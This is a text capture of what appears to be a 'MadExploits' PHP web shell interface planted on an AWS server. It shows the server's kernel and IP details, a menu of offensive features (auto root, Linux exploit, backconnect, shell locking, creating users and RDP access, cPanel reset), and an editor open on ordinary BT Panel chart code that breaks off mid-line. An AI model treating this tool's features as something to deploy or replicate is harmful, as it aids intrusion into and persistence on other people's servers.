Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 13.59.134.12
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
server /
panel /
BTPanel /
static /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
Validform_v5.3.2_min.js
20.17
KB
-rwxr-xr-x
aes.js
22.15
KB
-rwxr-xr-x
bootstrap-select.min.js
30.91
KB
-rwxr-xr-x
bootstrap.min.js
35.95
KB
-rwxr-xr-x
bt_upload.js
6.46
KB
-rwxr-xr-x
china.js
60.38
KB
-rwxr-xr-x
clipboard.min.js
10.41
KB
-rwxr-xr-x
config.js
62.92
KB
-rwxr-xr-x
control.js
43.36
KB
-rwxr-xr-x
countryCode.json
27.27
KB
-rwxr-xr-x
crontab.js
61.74
KB
-rwxr-xr-x
database.js
103.01
KB
-rwxr-xr-x
docker.js
151.43
KB
-rwxr-xr-x
echarts.min.js
950.32
KB
-rwxr-xr-x
files.js
233.97
KB
-rwxr-xr-x
files.min.js
121.19
KB
-rwxr-xr-x
firewall.js
102.42
KB
-rwxr-xr-x
i18next.min.js
47.94
KB
-rwxr-xr-x
index.html
0
B
-rwxr-xr-x
index.js
123.52
KB
-rwxr-xr-x
jquery-1.10.2.min.js
90.88
KB
-rwxr-xr-x
jquery-2.2.4.min.js
83.57
KB
-rwxr-xr-x
jquery-ui.min.js
247.72
KB
-rwxr-xr-x
jquery.contextify.min.js
2.7
KB
-rwxr-xr-x
jquery.dragsort-0.5.2.min.js
8.92
KB
-rwxr-xr-x
jquery.fly.min.js
1.79
KB
-rwxr-xr-x
jquery.i18n.properties.js
16.59
KB
-rwxr-xr-x
jquery.qrcode.min.js
13.67
KB
-rwxr-xr-x
jsencrypt.min.js
175.64
KB
-rwxr-xr-x
logs.js
39.53
KB
-rwxr-xr-x
md5.js
8.34
KB
-rwxr-xr-x
polyfill.js
9.31
KB
-rwxr-xr-x
polyfill.min.js
520
B
-rwxr-xr-x
public.js
231.13
KB
-rwxr-xr-x
public_backup.js
352.53
KB
-rwxr-xr-x
qrcode.min.js
19.46
KB
-rwxr-xr-x
requestAnimationFrame.js
901
B
-rwxr-xr-x
site.js
458.68
KB
-rwxr-xr-x
socket.io.min.js
63.54
KB
-rwxr-xr-x
soft.js
266.85
KB
-rwxr-xr-x
term.js
48.74
KB
-rwxr-xr-x
tools.js
130.2
KB
-rwxr-xr-x
tools.min.js
80.67
KB
-rwxr-xr-x
upload-drog.js
38.45
KB
-rwxr-xr-x
upload.js
8.11
KB
-rwxr-xr-x
xterm.js
295.86
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : control.js
var controlObj = { // 监控 conTrolView: { init: function () { var that = this; var networkType = bt.get_cookie('network-unitType') if (!networkType) { bt.set_cookie('network-unitType', 'KB/s') networkType = 'KB/s' } var diskType = bt.get_cookie('disk-unitType') if (!diskType) { bt.set_cookie('disk-unitType', 'KB/s') diskType = 'KB/s' } $(".network-unit .picker-text-list").text(networkType); $(".disk-unit .picker-text-list").text(diskType); $(".network-unit .select-list-item li:contains(" + networkType + ")").addClass("active"); $(".disk-unit .select-list-item :contains(" + diskType + ")").addClass("active"); $(".bt-crontab-select-button").on('click', '.select-picker-search', function () { $(this).next().toggle(); if ($(this).parent().hasClass('network-unit')) { $(".disk-unit .select-list-item").hide(); } else { $(".network-unit .select-list-item").hide(); } }); $(".bt-crontab-select-button").on('click', '.select-list-item li', function () { var _button = $(this).parents('.bt-crontab-select-button'); $(this).addClass('active').siblings().removeClass('active'); _button.find('.picker-text-list').text($(this).text()); _button.find(".select-list-item").toggle(); var cookie_type = $(this).parents('.bgw').find('.searcTime .time_range_submit').attr('data-type'); setCookie(cookie_type + '-unitType', $(this).attr('data-attr')); $(this).parents('.bgw').find('.searcTime .gt.on').click(); }); // 默认显示7天周期图表 setTimeout(function () { that.Wday(0, 'getload'); }, 500); setTimeout(function () { that.Wday(0, 'cpu'); }, 500); setTimeout(function () { that.Wday(0, 'mem'); }, 1000); setTimeout(function () { that.Wday(0, 'disk'); }, 1500); setTimeout(function () { that.Wday(0, 'network'); }, 2000); $('.btime').val(that.get_today() + ' 00:00:00'); $('.etime').val(that.get_today() + ' 23:59:59'); that.GetStatus(); $(".st").hover(function () { $(this).next().show(); }, function () { $(this).next().hide(); $(this).next().hover(function () { $(this).show(); }, function () { $(this).hide(); }) }); $(".searcTime .gt").click(function () { $(this).addClass("on").siblings().removeClass("on"); $(this).siblings('.ss').children('.on').removeClass('on'); }); $('.time_range_submit').click(function () { $(this).parents(".searcTime").find("span").removeClass("on"); $(this).parents(".searcTime").find(".st").addClass("on"); var b = (new Date($(this).parent().find(".btime").val()).getTime()) / 1000; var e = (new Date($(this).parent().find(".etime").val()).getTime()) / 1000; b = Math.round(b); e = Math.round(e); var type = $(this).attr('data-type') var callback = that[type] if (callback) callback(b, e); }); }, // 指定天数 Wday: function (day, name) { var data = this.get_date(day); var b = data.b; var e = data.e; switch (name) { case "cpu": this.cpu(b, e); break; case "mem": this.mem(b, e); break; case "disk": this.disk(b, e); break; case "network": this.network(b, e); break; case "getload": this.getload(b, e); break; } //处理日报页面resize导致监控页图表没有重绘 var event = document.createEvent("HTMLEvents"); event.initEvent("resize", true, true); window.dispatchEvent(event); }, get_date: function (day) { var now = Math.floor((new Date().getTime()) / 1000); var b = 0; var e = now; if (day == 0) { b = (new Date(this.get_today() + " 00:00:00").getTime()) / 1000; } else if (day == 1) { b = (new Date(this.get_before_date(day) + " 00:00:00").getTime()) / 1000; e = (new Date(this.get_before_date(day) + " 23:59:59").getTime()) / 1000; } else { b = (new Date(this.get_before_date(day - 1) + " 00:00:00").getTime()) / 1000; } b = Math.floor(b); e = Math.floor(e); return { b: b, e: e } }, get_today: function () { var mydate = new Date(); return bt.format_data(mydate.getTime() / 1000, 'yyyy/MM/dd'); }, get_before_date: function (day) { var now = new Date(this.get_today()); var now_time = now.getTime(); var before_days_time = (now_time - (day * 24 * 3600 * 1000)) / 1000; return bt.format_data(before_days_time, 'yyyy/MM/dd'); }, //取监控状态 GetStatus: function () { loadT = layer.msg(lan.public.read, { icon: 16, time: 0 }) $.post('/config?action=SetControl', 'type=-1', function (rdata) { layer.close(loadT); if (rdata.status) { $("#openJK").html("<input class='btswitch btswitch-ios' id='ctswitch' type='checkbox' checked><label class='btswitch-btn' for='ctswitch' onclick='controlObj.conTrolView.SetControl()'></label>") } else { $("#openJK").html("<input class='btswitch btswitch-ios' id='ctswitch' type='checkbox'><label class='btswitch-btn' for='ctswitch' onclick='controlObj.conTrolView.SetControl()'></label>") } $("#saveDay").val(rdata.day) }) }, //设置监控状态 SetControl: function (act) { var day = new Number($("#saveDay").val() || 0) if (day < 1) { layer.msg(lan.control.save_day_err, { icon: 2 }); return; } if (act) { var type = $("#ctswitch").prop('checked') ? '1' : '0'; } else { var type = $("#ctswitch").prop('checked') ? '0' : '1'; } loadT = layer.msg(lan.public.the, { icon: 16, time: 0 }) if(!/^-?\d+$/.test(day)){ return layer.msg('The number of days to keep must be an integer', { icon: 2, time: 2000 }); } $.post('/config?action=SetControl', {type:type,day:day}, function (rdata) { layer.close(loadT); layer.msg(rdata.msg, { icon: rdata.status ? 1 : 2 }); }); }, // 清理记录 CloseControl: function () { bt.show_confirm(lan.control.close_log, lan.control.close_log_msg, function () { loadT = layer.msg(lan.public.the, { icon: 16, time: 0 }) $.post('/config?action=SetControl', 'type=del', function (rdata) { layer.close(loadT); $.get('/system?action=ReWeb'); layer.msg(rdata.msg, { icon: rdata.status ? 1 : 2 }); setTimeout(function () { location.reload(); }, 2000); }); }); }, // 字节单位转换MB ToSizeG: function (bytes) { var c = 1024 * 1024; var b = 0; if (bytes > 0) { var b = (bytes / c).toFixed(2); } return b; }, /** * 获取默认echart配置 */ get_default_option: function (startTime, endTime) { var interval = ((endTime - startTime) / 3) * 1000; return { tooltip: { trigger: 'axis', axisPointer: { type: 'cross' } }, grid: { bottom: 80 }, xAxis: { type: 'time', boundaryGap: ['1%', '0%'], minInterval: interval, axisLine: { lineStyle: { color: "#666" } }, axisLabel: { formatter: function (value) { return bt.format_data(value / 1000, 'MM/dd\nhh:mm'); } } }, yAxis: { type: 'value', boundaryGap: [0, '100%'], splitLine: { lineStyle: { color: "#ddd" } }, axisLine: { lineStyle: { color: "#666" } } }, dataZoom: [ { type: 'inside', start: 0, end: 100, zoomLock: true }, { bottom: 10, start: 0, end: 100, handleIcon: 'M10.7,11.9v-1.3H9.3v1.3c-4.9,0.3-8.8,4.4-8.8,9.4c0,5,3.9,9.1,8.8,9.4v1.3h1.3v-1.3c4.9-0.3,8.8-4.4,8.8-9.4C19.5,16.3,15.6,12.2,10.7,11.9z M13.3,24.4H6.7V23h6.6V24.4z M13.3,19.6H6.7v-1.4h6.6V19.6z', handleSize: '80%', handleStyle: { color: '#fff', shadowBlur: 3, shadowColor: 'rgba(0, 0, 0, 0.6)', shadowOffsetX: 2, shadowOffsetY: 2 } } ] } }, /** * 补全数据 * @param {*} rdata */ set_data: function (data, startTime, endTime) { if (data.length <= 0) return; var time; // var min = data[0]; // min.addtime = min.addtime.replace(/([0-9]{2}\/[0-9]{2}).{1}[0-9:]*/, '$1 00:00'); // data.unshift(min); // for (var key in data[0]) { // if (key == 'addtime') continue; // data[0][key] = 0; // } for (var i = 0; i < data.length; i++) { if (typeof data[i].addtime === "number") continue; time = this.get_time(data[i].addtime, data[data.length - 1].addtime); data[i].addtime = time; } }, get_time: function (date, endDate) { var endMonth = endDate.split(' ')[0].split('/'); endMonth = parseInt(endMonth); var today = new Date(); var str = date.split(' '); var dateStr = str[0].split('/'); var timeStr = str[1].split(':'); var month = parseInt(dateStr[0]); var year = today.getFullYear(); var toMonth = today.getMonth()+1; //当前月份 if (month > toMonth || (month == 12 && month == endMonth)) { year -= 1; } var newDate = new Date(year, month - 1, dateStr[1], timeStr[0], timeStr[1]); return newDate.getTime(); }, cpuTopData:{}, //cpu cpu: function (b, e) { var _that = this; var that = controlObj.conTrolView; $.get('/ajax?action=GetCpuIo&start=' + b + '&end=' + e, function (rdata) { that.set_data(rdata, b, e); var myChartCpu = echarts.init(document.getElementById('cpuview')); var xData = []; var yData = []; //var zData = []; if (rdata.length > 0) { for (var i = 0; i < rdata.length; i++) { var item = rdata[i] yData.push([item.addtime, item.pro]); if(_that.cpuTopData === undefined) _that.cpuTopData = {}; _that.cpuTopData[item.addtime] = item.cpu_top; } var startTime = rdata[0].addtime / 1000; var endTime = rdata[rdata.length - 1].addtime / 1000; var option = that.get_cpu_option(startTime, endTime, yData); myChartCpu.setOption(option); window.addEventListener("resize", function () { myChartCpu.resize(); }); } }); }, /** * 获取cpu图表配置 */ get_cpu_option: function (startTime, endTime, yData) { var that = this; var option = this.get_default_option(startTime, endTime); option.tooltip.formatter = function (config) { var legendList = ''; for (var i = 0; i < config.length; i++) { var item = config[i]; legendList += '<div class="select-data"><span class="status" style="background-color: '+ item.color +'"></span><span>'+ item.seriesName + ':' + item.data[1].toFixed(2) +'%</span></div>' } return that.echarts_formatter({ time: config[0].axisValueLabel, data: that.cpuTopData[config[0].axisValue], legend: legendList }) }; option.tooltip.padding = 0; option.tooltip.backgroundColor = 'rgba(255,255,255,0.95)'; option.tooltip.borderColor = '#eee'; option.tooltip.position = function (pos, params, dom, rect, size) { return that.echarts_position('cpuview',{pos:pos,size:size}) } option.yAxis.name = lan.public.pre; option.yAxis.min = 0; option.yAxis.max = 100; option.series = [ { name: 'CPU', type: 'line', smooth: true, symbol: 'circle', showSymbol: false, itemStyle: { normal: { color: 'rgb(0, 153, 238)' } }, data: yData } ]; return option; }, memTopData:{}, //内存 mem: function (b, e) { var _that = this; var that = controlObj.conTrolView; $.get('/ajax?action=GetCpuIo&start=' + b + '&end=' + e, function (rdata) { that.set_data(rdata, b, e); var myChartMen = echarts.init(document.getElementById('memview')); var xData = []; //var yData = []; var zData = []; if (rdata.length > 0) { for (var i = 0; i < rdata.length; i++) { var item = rdata[i] // xData.push(rdata[i].addtime); // yData.push(rdata[i].pro); // zData.push(rdata[i].mem); zData.push([rdata[i].addtime, rdata[i].mem]); if(_that.memTopData === undefined) _that.memTopData = {}; _that.memTopData[item.addtime] = item.memory_top; } var startTime = rdata[0].addtime / 1000; var endTime = rdata[rdata.length - 1].addtime / 1000; option = that.get_mem_option(startTime, endTime, zData); myChartMen.setOption(option); window.addEventListener("resize", function () { myChartMen.resize(); }); } }) }, /** * 获取mem图表配置 */ get_mem_option: function (startTime, endTime, zData) { var that = this; var option = this.get_default_option(startTime, endTime); option.tooltip.formatter = function (config) { var legendList = ''; for (var i = 0; i < config.length; i++) { var item = config[i]; legendList += '<div class="select-data"><span class="status" style="background-color: '+ item.color +'"></span><span>'+ item.seriesName + ':' + item.data[1].toFixed(2) +'%</span></div>' } return that.echarts_formatter({ time: config[0].axisValueLabel, data: that.memTopData[config[0].axisValue], table:[ {title:'PID', width:'40px', index: 1}, {title: lan.control.process_name, index: 2}, {title: lan.control.memory_usage, index: 0, unit:function (val){ return bt.format_size(val) }}, {title: lan.control.startup_user, index: 4}, ], legend: legendList }) }; option.tooltip.padding = 0; option.tooltip.backgroundColor = 'rgba(255,255,255,0.95)'; option.tooltip.borderColor = '#eee'; option.tooltip.position = function (pos, params, dom, rect, size) { return that.echarts_position('memview',{pos:pos,size:size}) } option.yAxis.name = lan.public.pre; option.yAxis.min = 0; option.yAxis.max = 100; option.series = [ { name: lan.index.process_mem, type: 'line', smooth: true, symbol: 'circle', showSymbol: false, itemStyle: { normal: { color: 'rgb(0, 153, 238)' } }, data: zData } ]; return option; }, diskTopData:{}, //磁盘io disk: function (b, e) { var _that = this; var that = controlObj.conTrolView; $.get('/ajax?action=GetDiskIo&start=' + b + '&end=' + e, function (rdata) { that.set_data(rdata, b, e); var diskview = document.getElementById('diskview'), myChartDisk = echarts.init(diskview), rData = [], wData = [], xData = [],zData = [],yData = [], unit_size = 1, _unit = getCookie('disk-unitType'); $(diskview).next().removeClass('hide').addClass('show'); switch (_unit) { case 'MB/s': unit_size = 1024; break; case 'GB/s': unit_size = 1024 * 1024; break; default: unit_size = 1; break; } var is_gt_MB = false; var is_gt_GB = false; for (var i = 0; i < rdata.length; i++) { var item = rdata[i]; var read = (rdata[i].read_bytes / 1024).toFixed(3); var write = (rdata[i].write_bytes / 1024).toFixed(3); // rData.push(read / unit_size); // wData.push(write / unit_size); // xData.push(rdata[i].addtime); rData.push([rdata[i].addtime, read / unit_size]); wData.push([rdata[i].addtime, write / unit_size]); yData.push([rdata[i].addtime,rdata[i].read_count + rdata[i].write_count]); zData.push([rdata[i].addtime,rdata[i].read_time + rdata[i].write_time]); if(_that.diskTopData === undefined) _that.diskTopData = {}; _that.diskTopData[item.addtime] = item.disk_top; var read_MB = read / 1024; var write_MB = write / 1024; if ((read_MB >= 1 || write_MB >= 1) && !is_gt_MB) { is_gt_MB = true; } if (is_gt_MB) { var read_GB = read_MB / 1024; var write_GB = write_MB / 1024; if ((read_GB >= 1 || write_GB >= 1) && !is_gt_GB) { // console.log(read_GB); // console.log(write_GB); is_gt_GB = true; } } } if (!is_gt_GB) { $('#diskview').next().find('.select-list-item li').eq(2).hide(); } else { $('#diskview').next().find('.select-list-item li').eq(2).show(); } if (!is_gt_MB) { $('#diskview').next().find('.select-list-item li').eq(1).hide(); } else { $('#diskview').next().find('.select-list-item li').eq(1).show(); } if (rdata.length > 0) { var startTime = rdata[0].addtime / 1000; var endTime = rdata[rdata.length - 1].addtime / 1000; var option = that.get_disk_option(_unit, startTime, endTime, rData, wData,zData,yData); myChartDisk.setOption(option); window.addEventListener("resize", function () { myChartDisk.resize(); }); } }) }, /** * 获取磁盘IO图表配置 */ get_disk_option: function (unit, startTime, endTime, rData, wData,zData,yData) { var that = this; var option = this.get_default_option(startTime, endTime); option.tooltip.formatter = function (config) { var legendList = ''; for (var i = 0; i < config.length; i++) { var item = config[i],_unit = ''; if(item.seriesName === lan.control.disk_rw_times) _unit = '/s' if(item.seriesName === lan.control.disk_rw_wait) _unit = 'ms' if(item.seriesName === '读取' || item.seriesName === '写入') _unit = unit legendList += '<div class="select-data">' + '<span class="status" style="background-color: '+ item.color +'"></span>' + '<span>'+ item.seriesName + ':' + item.data[1].toFixed(2) + ' ' + _unit +'</span>' + '</div>' } return that.echarts_formatter({ time: config[0].axisValueLabel, data: that.diskTopData[config[0].axisValue], width: '510px', table:[ {title: 'PID', width: '40px',index:3}, {title: lan.control.process_name, width: '50px', index: 4}, {title: lan.control.disk_usage, index: 0, unit:function (val){ return bt.format_size(val); }}, {title: lan.control.read, index: 1, unit:function (val){ return bt.format_size(val); }}, {title: lan.control.write, index: 2, unit:function (val){ return bt.format_size(val); }}, {title: lan.control.startup_user, index: 6}, ], legend: legendList }) }; option.tooltip.padding = 0; option.tooltip.backgroundColor = 'rgba(255,255,255,0.95)'; option.tooltip.borderColor = '#eee'; option.tooltip.position = function (pos, params, dom, rect, size) { return that.echarts_position('diskview',{pos:pos,size:size}) } option.legend = { top: '18px', data: [lan.control.disk_read_bytes, lan.control.disk_write_bytes, lan.control.disk_rw_times, lan.control.disk_rw_wait] }; option.series = [ { name: lan.control.disk_read_bytes, type: 'line', smooth: true, symbol: 'circle', showSymbol: false, itemStyle: { normal: { color: 'rgb(255, 70, 131)' } }, data: rData }, { name: lan.control.disk_write_bytes, type: 'line', smooth: true, symbol: 'circle', showSymbol: false, itemStyle: { normal: { color: 'rgba(46, 165, 186, .7)' } }, data: wData } , { name: lan.control.disk_rw_times, type: 'line', smooth: true, symbol: 'circle', showSymbol: false, itemStyle: { normal: { color: 'rgba(30, 144, 255)' } }, data: yData } , { name: lan.control.disk_rw_wait, type: 'line', smooth: true, symbol: 'circle', showSymbol: false, itemStyle: { normal: { color: 'rgba(255, 140, 0)' } }, data: zData } ]; return option; }, //网络Io network: function (b, e) { var that = controlObj.conTrolView; $.get('/ajax?action=GetNetWorkIo&start=' + b + '&end=' + e, function (rdata) { that.set_data(rdata, b, e); var anetwork = document.getElementById('network'), myChartNetwork = echarts.init(anetwork), aData = [], bData = [], cData = [], dData = [], xData = [], yData = [], zData = [], unit_size = 1, _unit = getCookie('network-unitType'), network_io = [{ title: lan.control.all, value: 'all' }], network_select = $('[name="network-io"]'), network_html = '<option value="">' + lan.control.all + '</option>', is_network = 0, network_io_key = bt.get_cookie('network_io_key') || ''; $(anetwork).next().removeClass('hide').addClass('show'); switch (_unit) { case 'MB/s': unit_size = 1024; break; case 'GB/s': unit_size = 1024 * 1024; break; default: unit_size = 1; break; } network_select.unbind('change').change(function () { bt.set_cookie('network_io_key', $(this).val()); that.network(b, e); }).removeClass('hide'); var is_gt_MB = false; var is_gt_GB = false; for (var i = 0; i < rdata.length; i++) { var items = rdata[i]; if (is_network < 1 && typeof items.down_packets === 'object') { for (var key in items.down_packets) { network_html += '<option value="' + key + '" ' + (network_io_key === key ? 'selected' : '') + '>' + key + '</option>'; } network_select.html(network_html); is_network++; } if (typeof network_io_key != 'undefined' && network_io_key != '') { if (typeof items.down_packets === 'object') { // zData.push(items.down_packets[network_io_key] / unit_size); zData.push([items.addtime, items.down_packets[network_io_key] / unit_size]); } else { // zData.push(0); zData.push([items.addtime, 0]); } } else { // zData.push(items.down / unit_size); zData.push([items.addtime, items.down / unit_size]); } if (typeof network_io_key != 'undefined' && network_io_key != '') { if (typeof items.up_packets === 'object') { // yData.push(items.up_packets[network_io_key] / unit_size); yData.push([items.addtime, items.up_packets[network_io_key] / unit_size]); } else { // yData.push(0); yData.push([items.addtime, 0]); } } else { // yData.push(items.up / unit_size); yData.push([items.addtime, items.up / unit_size]); } var up_MB = items.up / 1024; var down_MB = items.down / 1024; if ((up_MB >= 1 || down_MB >= 1) && !is_gt_MB) { is_gt_MB = true; } if (is_gt_MB) { var up_GB = up_MB / 1024; var down_GB = down_MB / 1024; if ((up_GB >= 1 || down_GB >= 1) && !is_gt_GB) { is_gt_GB = true; } } // xData.push(items.addtime); } if (!is_gt_GB) { $('#network').next().find('.select-list-item li').eq(2).hide(); } else { $('#network').next().find('.select-list-item li').eq(2).show(); } if (!is_gt_MB) { $('#network').next().find('.select-list-item li').eq(1).hide(); } else { $('#network').next().find('.select-list-item li').eq(1).show(); } if (rdata.length > 0) { var startTime = rdata[0].addtime / 1000; var endTime = rdata[rdata.length - 1].addtime / 1000; var option = that.get_network_option(_unit, startTime, endTime, yData, zData); myChartNetwork.setOption(option); window.addEventListener("resize", function () { myChartNetwork.resize(); }); } }) }, /** * 获取网络IO图表配置 */ get_network_option: function (unit, startTime, endTime, yData, zData) { var that = this; var option = this.get_default_option(startTime, endTime); option.tooltip.formatter = function (config) { var data = config[0]; var time = data.data[0]; var date = bt.format_data(time / 1000); var _tips = ''; for (var i = 0; i < config.length; i++) { var item = config[i] _tips += '<div class="select-data">' + '<span class="status" style="background-color: '+ item.color +'"></span>' + '<span>'+ item.seriesName +':'+ item.data[1].toFixed(3) +' '+ unit +'</span>' + '</div>' } return that.echarts_formatter({ width:'280px', time: config[0].axisValueLabel, legend: _tips }) }; option.tooltip.padding = 0; option.tooltip.backgroundColor = 'rgba(255,255,255,0.95)'; option.tooltip.borderColor = '#eee'; option.tooltip.position = function (pos, params, dom, rect, size) { return that.echarts_position('network',{pos:pos,size:size}) } option.legend = { top: '18px', data: [lan.index.net_up, lan.index.net_down] }; option.series = [ { name: lan.index.net_up, type: 'line', smooth: true, symbol: 'circle', showSymbol: false, itemStyle: { normal: { color: 'rgb(255, 140, 0)' } }, data: yData }, { name: lan.index.net_down, type: 'line', smooth: true, symbol: 'circle', showSymbol: false, itemStyle: { normal: { color: 'rgb(30, 144, 255)' } }, data: zData } ]; return option; }, // 负载 getload_old: function (b, e) { $.get('/ajax?action=get_load_average&start=' + b + '&end=' + e, function (rdata) { var myChartgetload = echarts.init(document.getElementById('getloadview')); var aData = []; var bData = []; var xData = []; var yData = []; var zData = []; for (var i = 0; i < rdata.length; i++) { xData.push(rdata[i].addtime); yData.push(rdata[i].pro); zData.push(rdata[i].one); aData.push(rdata[i].five); bData.push(rdata[i].fifteen); } var interval = ((e - b) / 3) * 1000; option = { tooltip: { trigger: 'axis' }, calculable: true, legend: { data: [lan.control.sys_resource_usage, lan.control.m1, lan.control.m5, lan.control.m15], selectedMode: 'single', }, xAxis: { type: 'category', boundaryGap: false, data: xData, minInterval: interval, axisLine: { lineStyle: { color: "#666" } } }, yAxis: { type: 'value', name: '', boundaryGap: [0, '100%'], splitLine: { lineStyle: { color: "#ddd" } }, axisLine: { lineStyle: { color: "#666" } } }, dataZoom: [{ type: 'inside', start: 0, end: 100, zoomLock: true }, { start: 0, end: 100, handleIcon: 'M10.7,11.9v-1.3H9.3v1.3c-4.9,0.3-8.8,4.4-8.8,9.4c0,5,3.9,9.1,8.8,9.4v1.3h1.3v-1.3c4.9-0.3,8.8-4.4,8.8-9.4C19.5,16.3,15.6,12.2,10.7,11.9z M13.3,24.4H6.7V23h6.6V24.4z M13.3,19.6H6.7v-1.4h6.6V19.6z', handleSize: '80%', handleStyle: { color: '#fff', shadowBlur: 3, shadowColor: 'rgba(0, 0, 0, 0.6)', shadowOffsetX: 2, shadowOffsetY: 2 } }], series: [ { name: lan.control.sys_resource_usage, type: 'line', smooth: true, showSymbol: true, symbol: 'circle', sampling: 'average', itemStyle: { normal: { color: 'rgb(255, 140, 0)' } }, data: yData }, { name: lan.control.m1, type: 'line', smooth: true, showSymbol: true, symbol: 'circle', sampling: 'average', itemStyle: { normal: { color: 'rgb(30, 144, 255)' } }, data: zData }, { name: lan.control.m5, type: 'line', smooth: true, showSymbol: true, symbol: 'circle', sampling: 'average', itemStyle: { normal: { color: 'rgb(0, 178, 45)' } }, data: aData }, { name: lan.control.m15, type: 'line', smooth: true, showSymbol: true, symbol: 'circle', sampling: 'average', itemStyle: { normal: { color: 'rgb(147, 38, 255)' } }, data: bData } ] }; myChartgetload.setOption(option); window.addEventListener("resize", function () { myChartgetload.resize(); }); }) }, loadCpuTopData: {}, // 系统负载 getload: function (b, e) { var _that = this; var that = controlObj.conTrolView; $.get('/ajax?action=get_load_average&start=' + b + '&end=' + e, function (rdata) { that.set_data(rdata, b, e); var myChartgetload = echarts.init(document.getElementById('getloadview')); var aData = []; var bData = []; var xData = []; var yData = []; var zData = []; for (var i = 0; i < rdata.length; i++) { // xData.push(rdata[i].addtime); // yData.push(rdata[i].pro); // zData.push(rdata[i].one); // aData.push(rdata[i].five); // bData.push(rdata[i].fifteen); zData.push([rdata[i].addtime, rdata[i].one]); yData.push([rdata[i].addtime, rdata[i].pro]); aData.push([rdata[i].addtime, rdata[i].five]); bData.push([rdata[i].addtime, rdata[i].fifteen]); if(_that.loadCpuTopData === undefined) _that.loadCpuTopData = {}; _that.loadCpuTopData[rdata[i].addtime] = rdata[i].cpu_top; } if (rdata.length > 0) { var startTime = rdata[0].addtime / 1000; var endTime = rdata[rdata.length - 1].addtime / 1000; var option = that.get_load_option(startTime, endTime, yData, zData, aData, bData); myChartgetload.setOption(option); window.addEventListener("resize", function () { myChartgetload.resize(); }); } }) }, /** * 获取平均负载图表配置 */ get_load_option: function (startTime, endTime, yData, zData, aData, bData) { var that = this; var option = this.get_default_option(startTime, endTime); var interval = ((endTime - startTime) / 3) * 1000; option.tooltip.padding = 0; option.tooltip.backgroundColor = 'rgba(255,255,255,0.95)'; option.tooltip.borderColor = '#eee'; option.tooltip.position = function (pos, params, dom, rect, size) { return that.echarts_position('getloadview',{pos:pos,size:size}) } option.tooltip.formatter = function (config) { var tdList = '', selectList = '', resource = ''; for (var i = 0; i < config.length; i++) { var item = config[i]; switch (item.seriesName){ case lan.control.m1: case lan.control.m5: case lan.control.m15: selectList += '<div class="select-data"><span class="status" style="background-color: '+ item.color +'"></span><span>'+ item.seriesName +':'+ item.data[1].toFixed(2) +'%</span></div>'; break; case lan.control.sys_resource_usage: resource = item.data[1].toFixed(2) break; } } return that.echarts_formatter({ time: config[0].axisValueLabel, data: that.loadCpuTopData[config[0].axisValue], legend: '<div class="select-data"><span class="status"></span><span>' + lan.control.sys_resource_usage + ': '+ resource +'%</span></div><div class="'+ (config[0].seriesName === lan.control.sys_resource_usage?'hide':'') +'">'+ selectList +'</div>' }) }; option.legend = { data: [lan.control.m1, lan.control.m5, lan.control.m15], right: '16%', top: '10px' }; option.axisPointer = { link: { xAxisIndex: 'all' }, lineStyle: { color: '#aaaa', width: 1 } }; // 直角坐标系内绘图网格 option.grid = [ { left: '5%', bottom: 80, right: '55%', width: '40%', height: 'auto' }, { bottom: 80, left: '55%', width: '40%', height: 'auto' } ]; // 直角坐标系grid的x轴 option.xAxis = [ { type: 'time', boundaryGap: ['1%', '0%'], minInterval: interval, axisLine: { lineStyle: { color: "#666" } }, axisLabel: { formatter: function (value) { return bt.format_data(value / 1000, 'MM/dd\nhh:mm'); } } }, { type: 'time', gridIndex: 1, boundaryGap: ['1%', '0%'], minInterval: interval, axisLine: { lineStyle: { color: "#666" } }, axisLabel: { formatter: function (value) { return bt.format_data(value / 1000, 'MM/dd\nhh:mm'); } } } ]; option.yAxis = [ { scale: true, name: lan.control.sys_resource_usage, min: 0, max: function (value) { // 最大值超过100 if (value.max >= 100) return Math.ceil(value.max); // 最大值超过80 if (value.max >= 80) return 100; // 小于80取当前最大值的首位数字 return parseInt((value.max + 10).toString().slice(0,1) + '0') }, // y轴网格显示 splitLine: { show: true, lineStyle: { color: "#ddd" } }, // 坐标轴名样式 nameTextStyle: { color: '#666', fontSize: 12, align: 'left' }, axisLine: { lineStyle: { color: '#666', } }, }, { scale: true, name: lan.control.load_detail, gridIndex: 1, splitLine: { show: true, lineStyle: { color: "#ddd" } }, nameTextStyle: { color: '#666', fontSize: 12, align: 'left' }, axisLine: { lineStyle: { color: '#666', } } } ]; option.dataZoom[0].xAxisIndex = [0, 1]; option.dataZoom[1].type = 'slider'; option.dataZoom[1].left = '5%'; option.dataZoom[1].right = '5%'; option.dataZoom[1].xAxisIndex = [0, 1]; option.series = [ { name: lan.control.sys_resource_usage, type: 'line', smooth: true, symbol: 'circle', showSymbol: false, lineStyle: { normal: { width: 2, color: 'rgb(255, 140, 0)' } }, itemStyle: { normal: { color: 'rgb(255, 140, 0)' } }, data: yData }, { xAxisIndex: 1, yAxisIndex: 1, name: lan.control.m1, type: 'line', smooth: true, symbol: 'circle', showSymbol: false, lineStyle: { normal: { width: 2, color: 'rgb(30, 144, 255)' } }, itemStyle: { normal: { color: 'rgb(30, 144, 255)' } }, data: zData }, { xAxisIndex: 1, yAxisIndex: 1, name: lan.control.m5, type: 'line', smooth: true, symbol: 'circle', showSymbol: false, lineStyle: { normal: { width: 2, color: 'rgb(0, 178, 45)' } }, itemStyle: { normal: { color: 'rgb(0, 178, 45)' } }, data: aData }, { xAxisIndex: 1, yAxisIndex: 1, name: lan.control.m15, type: 'line', smooth: true, symbol: 'circle', showSymbol: false, lineStyle: { normal: { width: 2, color: 'rgb(147, 38, 255)' } }, itemStyle: { normal: { color: 'rgb(147, 38, 255)' } }, data: bData } ]; option.textStyle = { color: '#666', fontSize: 12 }; return option; }, // 统计图图例定位 echarts_position: function (id,config){ var boxWidth = config.size.contentSize[0], boxHeight = config.size.contentSize[1], winWidth = window.innerWidth, winHeight = window.innerHeight, _box = document.getElementById(id).getBoundingClientRect(), _x = config.pos[0] + 